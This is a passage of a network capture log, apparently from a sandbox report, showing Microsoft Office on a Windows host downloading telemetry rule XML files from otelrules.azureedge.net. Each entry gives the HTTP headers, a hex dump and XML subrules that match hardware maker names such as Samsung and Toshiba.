                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 499
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                  ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                  x-ms-request-id: 3eb19cd4-801e-00ac-194b-3cfd65000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134715Z-15b8b599d88f9wfchC1TEBm2kc000000030g00000000k3ds
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:16 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  43192.168.2.44983613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:15 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:15 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                  x-ms-request-id: 4246a62e-c01e-008e-5315-3d7381000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134715Z-178bfbc474bvjk8shC1NYC83ns00000004f0000000002hds
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:16 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  44192.168.2.44983513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:15 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:16 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 471
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                  x-ms-request-id: 9906faf6-f01e-0052-624b-3c9224000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134716Z-15b8b599d88hr8sfhC1TEBbca400000002wg00000000998b
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:16 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  45192.168.2.44983713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:15 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:16 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 494
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB8972972"
                                                                                                                                                                                  x-ms-request-id: 375df28d-601e-00ab-5b0b-3d66f4000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134716Z-178bfbc474bmqmgjhC1NYCy16c00000004hg00000000cry0
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:16 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  46192.168.2.44983913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:17 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:18 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:18 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 472
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                  x-ms-request-id: 6e56f893-501e-008f-2178-3d9054000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134718Z-15b8b599d88s6mj9hC1TEBur3000000002ug00000000a71d
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:18 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  47192.168.2.44984113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:17 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:18 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:18 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 486
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                  ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                  x-ms-request-id: d6db62af-701e-0097-3243-3db8c1000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134718Z-15b8b599d88vp97chC1TEB5pzw0000000330000000001hd5
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:18 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  48192.168.2.44984013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:17 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:18 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 427
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                  x-ms-request-id: bf14eb60-501e-007b-507b-3b5ba2000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134718Z-174c587ffdfb5q56hC1TEB04kg00000002u000000000krzg
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:18 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  49192.168.2.44983813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:18 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:18 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 420
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                  x-ms-request-id: 2160d4c7-701e-0021-5913-3d3d45000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134718Z-178bfbc474bwlrhlhC1NYCy3kg00000004ng000000001rxx
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:18 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  50192.168.2.44984213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:18 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:18 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 423
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                  x-ms-request-id: 00870788-c01e-000b-155b-3ce255000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134718Z-178bfbc474bpnd5vhC1NYC4vr400000004k0000000008r1u
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:18 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  51192.168.2.44984313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:20 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:20 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 478
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9B233827"
                                                                                                                                                                                  x-ms-request-id: 4b4d3db7-601e-003d-0147-3c6f25000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134720Z-178bfbc474bbbqrhhC1NYCvw7400000004tg00000000101f
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:20 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


